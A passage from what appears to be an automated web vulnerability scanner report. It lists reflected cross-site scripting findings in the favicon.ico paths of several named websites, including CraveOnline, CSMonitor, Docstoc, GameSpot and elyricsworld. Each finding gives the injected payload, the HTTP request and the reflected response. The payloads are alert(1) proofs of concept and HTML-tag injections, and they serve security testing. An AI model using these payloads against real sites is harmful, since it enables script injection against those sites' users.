ch.this_url = 'http://www.collegehumor.com/favicon.ico?e1307'-alert(1)-'314d4297df=1';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2Zhdmljb24uaWNvP2UxMzA3Jy1hbGVydCgxKS0nMzE0ZDQyOTdkZj0x';
ch.home_url = 'http://www.collegehumor.com';
ch.user_id = 0
...[SNIP]...

6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b192--><a>42b747ad359 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico3b192--><a>42b747ad359 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56159
Date: Sat, 02 Apr 2011 14:20:35 GMT
X-Varnish: 878005268
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico3b192--><a>42b747ad359 -->
...[SNIP]...

6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a67'-alert(1)-'dd8390ff089 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88a67'-alert(1)-'dd8390ff089 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2
Status: 404 Not Found
Expires: Sat, 02 Apr 2011 14:25:32 GMT
Cache-Control: public, max-age=300
Vary: Accept-Encoding
X-Served-By: app2v-fe.sb.lax1
Content-Type: text/html; charset=UTF-8
Content-Length: 56303
Date: Sat, 02 Apr 2011 14:20:32 GMT
X-Varnish: 878005112
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS from pxy1v.sb.lax1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<!-- page created on - 12-03-10, 08:52:39 -->
<!-- $Id: pagegen.php 2816 2009-06-25 1
...[SNIP]...
<scr'+'ipt language="JavaScript" src="http://n4403ad.doubleclick.net/adj/gn.cr.craveonline.com/favicon.ico88a67'-alert(1)-'dd8390ff089;sect=favicon.ico88a67'-alert(1)-'dd8390ff089;ct=favicon.ico88a67'-alert(1)-'dd8390ff089;ci=;sz=1000x1000;tile='+(gnm_tile++)+';ord=' + gnm_ord + '?">
...[SNIP]...

6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6502"-alert(1)-"527e231a44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d6502"-alert(1)-"527e231a44 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.csmonitor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Sat, 02 Apr 2011 13:27:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86384
Expires: Sun, 03 Apr 2011 13:27:07 GMT
Date: Sat, 02 Apr 2011 13:27:23 GMT
Content-Length: 21591
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/d6502"-alert(1)-"527e231a44";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d5f5'-alert(1)-'7263aba8059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9d5f5'-alert(1)-'7263aba8059 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.docstoc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Set-Cookie: user_guid=1a45ceec-1c83-4750-a66d-bb53ea4fe27b; expires=Fri, 02-Apr-2021 13:31:59 GMT; path=/
Set-Cookie: first_time=1; domain=docstoc.com; path=/
Set-Cookie: session.docstoc.sourceinfo={"Source":"","Medium":"Direct","Term":"","Campaign":"","Content":""}; path=/
Set-Cookie: session.docstoc.seo={"Term":"","SEPage":"","SEType":""}; path=/
Set-Cookie: session.docstoc.source={"Refer":"","IP":"173.193.214.243","Country":"US","UA":"curl%2f7.21.0+(amd64-pc-win32)+libcurl%2f7.21.0+OpenSSL%2f0.9.8o+zlib%2f1.2.3"}; path=/
Set-Cookie: geoinfo.docstoc={"WorldRegionCode":1,"WorldRegionName":"United States","CountryCode":"US","CountryName":"United States","Region":"TX","City":"Dallas","Latitude":32.782501220703125,"Longitude":-96.8207015991211}; path=/
Set-Cookie: session.docstoc=d10a866a-2296-4f61-9582-da96250ad728; path=/
Set-Cookie: memguid.docstoc=811a77f3-6db6-4f0f-9360-a701e8733536; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: fingerprint.docstoc={"FingerprintId":"","DMA":"","City":"","Region":"","Country":"","Fonts":"","Plugins":"","UserAgent":"","IpAddress":"","Resolution":""}; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: pages_visited=1; path=/
Set-Cookie: general=showTopIE9=1,1,4/3/2011 6:31:59 AM; domain=docstoc.com; expires=Mon, 02-Apr-2012 13:31:59 GMT; path=/
Set-Cookie: cartItemCount=0; expires=Mon, 02-May-2011 13:31:59 GMT; path=/
serverID: www2
Date: Sat, 02 Apr 2011 13:31:58 GMT
Content-Length: 15433


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:media="http://search.
...[SNIP]...
insertBefore(ga, s);
})();
var redirectUrl='/login/FacebookLogin.aspx?returnURL=http%3a%2f%2fwww.docstoc.com%2fPageNotFound%2fPageNotFound.aspx%3f404%3bhttp%3a%2f%2fwww.docstoc.com%3a80%2ffavicon.ico9d5f5'-alert(1)-'7263aba8059';
_qoptions={qacct:"p-07Zpl6-aPXQAI"};
</script>
...[SNIP]...

6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8b31<a>cfeca55b272 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /c8b31<a>cfeca55b272 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.domaintools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sat, 02 Apr 2011 14:45:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:45:19 GMT
Content-Length: 11939
Connection: close
Set-Cookie: dtsession=0c96c752b97d8eeab552cf2acdcba16d; expires=Tue, 30 Mar 2021 13:45:19 GMT; path=/; domain=.domaintools.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>cfeca55b272">Whois record for "c8b31<a>cfeca55b272"</a>
...[SNIP]...

6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27027"-alert(1)-"893baf0fdc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico27027"-alert(1)-"893baf0fdc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:11 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SelectedCarID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedTrimID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: SelectedStyleID=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: TplType=2; expires=Mon, 09-May-2011 01:39:12 GMT; path=/
Set-Cookie: Ds_client=ed826f9ef3019c3a25abefb6fd651b0d; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: UUID=DS-7fa5332a-91f8-76bb-ffa3-9ec63b1c8a2c; expires=Tue, 30-Mar-2021 13:39:12 GMT; path=/
Set-Cookie: business_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Set-Cookie: partner_id=deleted; expires=Fri, 02-Apr-2010 13:39:11 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
<!--

/* Copyright 1997-2004 Omniture, Inc. */
s.prop1="DS";
s.prop2="Sat";
s.prop3="06";
s.prop7="/favicon.ico27027"-alert(1)-"893baf0fdc8";
s.prop15="unregistered";
s.prop16="logged out";
s.prop17="non-member";
s.eVar1="DS";
s.eVar12="Sat";
s.eVar13="06";
s.eVar15="unregistered";
s.eVar16="logged out";
s.eVar17="non-member";
s.zip=""
/*
...[SNIP]...

6.37. http://www.education.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2a97"%3b06af93cafcd was submitted in the REST URL parameter 1. This input was echoed as d2a97";06af93cafcd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icod2a97"%3b06af93cafcd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.education.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sat, 02 Apr 2011 13:35:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: e=fhkbhen0kd9vs4jlqhf6ju3g10; expires=Sat, 02-Apr-2011 23:35:10 GMT; path=/; domain=www.education.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: i=0; expires=Tue, 14-Jun-2011 13:35:10 GMT; path=/
Content-Length: 140381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
   <head>
       <meta http-equiv="co
...[SNIP]...
<!--if(!s.pageName) s.pageName="Education.com | An Education & Child Development Site for Parents | Parenting & Educational Resource";
s.pageType="errorPage";
if(!s.channel) s.channel="favicon.icod2a97";06af93cafcd";
s.prop5=Cookie.get('registered');
s.prop6=0;
s.prop7='organic';
s.eVar15='organic';
s.prop13='Home Page';
s.prop17='none';
s.campaign='';
s.prop18='web00';
if(Cookie.read&&Cookie.read('sevent', {pat
...[SNIP]...

6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15911"><a>dcba971d871 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico15911"><a>dcba971d871 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<input type="hidden" name="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911"><A>DCBA971D871EDTHR2WGPMZ0400HR2WGPMZ14400" id="GBORGVHR2WGPMZ2HR2WGPMZ0173HR2WGPMZ193HR2WGPMZ214HR2WGPMZ243HTTPHR2WGPMZHR2WGPMZHR2WGPMZWWWHR2WGPMZEGOTASTICHR2WGPMZCOMHR2WGPMZFAVICONHR2WGPMZICO15911">
...[SNIP]...

6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bbdc<script>alert(1)</script>7e8efe51f47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 126726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<p>The page you are looking for: "http://www.egotastic.com/favicon.ico4bbdc<script>alert(1)</script>7e8efe51f47" seems to be missing.</p>
...[SNIP]...

6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyrics.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7526b<script>alert(1)</script>c49fd957cea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7526b<script>alert(1)</script>c49fd957cea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyrics.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:36:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1173
Content-Type: text/html

<html>
<head><title>Page not Found on elyrics.net</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body><h1>Error 404 Page not Found</h1>
   <a href="/"><img src="http://a527.ac-images.
...[SNIP]...
<font color=red>/favicon.ico7526b<script>alert(1)</script>c49fd957cea</font>
...[SNIP]...

6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 66975</title><script>alert(1)</script>b548febdb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico66975</title><script>alert(1)</script>b548febdb4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1419
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico66975</title><script>alert(1)</script>b548febdb4d not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
...[SNIP]...

6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4097f<script>alert(1)</script>ca01e159581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4097f<script>alert(1)</script>ca01e159581 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1403
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   fo
...[SNIP]...
<h1>/favicon.ico4097f<script>alert(1)</script>ca01e159581 not found on elyricsworld.com</h1>
...[SNIP]...

6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 4ae7d</title><script>alert(1)</script>1082cba203e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:04 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1425
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?4ae7d</title><script>alert(1)</script>1082cba203e=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body

...[SNIP]...

6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48892<script>alert(1)</script>4686b36e033 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?48892<script>alert(1)</script>4686b36e033=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 20:22:03 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1409
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{

...[SNIP]...
<h1>/favicon.ico?48892<script>alert(1)</script>4686b36e033=1 not found on elyricsworld.com</h1>
...[SNIP]...

6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc61f'%3bd646a62950f was submitted in the REST URL parameter 1. This input was echoed as cc61f';d646a62950f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.icocc61f'%3bd646a62950f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydayhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File Not Found
Date: Sat, 02 Apr 2011 13:27:14 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB07
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=Acwny4THb9g0MzViZGNkYi0xYTc0LTQxYTEtOGNlYy1jMjZhMDg0NDQ3NGM1; expires=Sat, 11-Jun-2011 00:07:14 GMT; path=/
Set-Cookie: ASP.NET_SessionId=kijeui555z3zjjmaqxna4s55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/favicon.icocc61f';d646a62950f', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cd8"><script>alert(1)</script>0043b9c4893 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico95cd8"><script>alert(1)</script>0043b9c4893 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:27:07 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Mon, 02-May-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQ5NzI0MmJhZGMxZDZmM2I2YzQ0ZDQ4NzY1ZQ%3D%3D; expires=Thu, 29-Sep-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_040211=1; expires=Tue, 05-Apr-2011 13:27:07 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/favicon.ico95cd8"><script>alert(1)</script>0043b9c4893" />
...[SNIP]...

6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 599e8'a%3d'b'629f0608bc6 was submitted in the REST URL parameter 1. This input was echoed as 599e8'a='b'629f0608bc6 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico599e8'a%3d'b'629f0608bc6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:33:25 GMT
Connection: close
